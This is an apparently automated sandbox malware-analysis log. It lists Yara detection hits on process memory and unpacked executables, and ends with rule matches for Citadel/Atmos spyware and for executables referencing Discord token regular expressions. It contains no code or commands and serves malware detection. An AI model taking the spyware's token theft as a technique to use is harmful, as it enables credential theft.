                        Source: Yara matchFile source: Process Memory Space: services.png.exe PID: 6516, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: nyheukpo.exe PID: 1460, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XRdxSzSUL8yOL.exe PID: 5012, type: MEMORYSTR
                        Source: Yara matchFile source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.3.explorer.exe.c350000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.services.png.exe.2810000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.explorer.exe.c350000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.services.png.exe.2810000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.3.nyheukpo.exe.40fb2d4.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.3.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000000.2127013709.0000000002F50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000000.2085005947.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000000.2075479994.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.1790120113.0000000000110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000000.1766360463.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000002.2973995755.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.2066606336.0000000000010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000000.2096580735.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000000.2120619904.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000002.2964235219.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.2966547595.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000003.2032162611.0000000000190000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.2029881834.0000000000190000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000000.2032466719.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000003.1955044832.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000000.1792075779.0000000000A90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.2070787045.0000000000010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000002.2968177291.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000000.2070992540.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000000.1941072289.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000029.00000000.2141291646.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001C.00000003.2096406602.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.2968884434.0000000002F50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000003.2084799594.0000000000030000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000000.1786038916.0000000000110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000002.2961588503.0000000002400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000002.2973089059.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.2962312014.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000000.2118224056.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000000.2081513411.0000000000030000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000003.2029731721.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000000.2136239624.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000002.2972478515.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000000.1965985487.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000025.00000002.2952993585.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000000.2115641562.0000000002400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2100223475.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000000.1981353060.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: services.png.exe PID: 6516, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: nyheukpo.exe PID: 1460, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XRdxSzSUL8yOL.exe PID: 5012, type: MEMORYSTR

                        System Summary

                        barindex
                        Source: services.png.exe, type: SAMPLEMatched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
                        Source: dump.pcap, type: PCAPMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                        Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
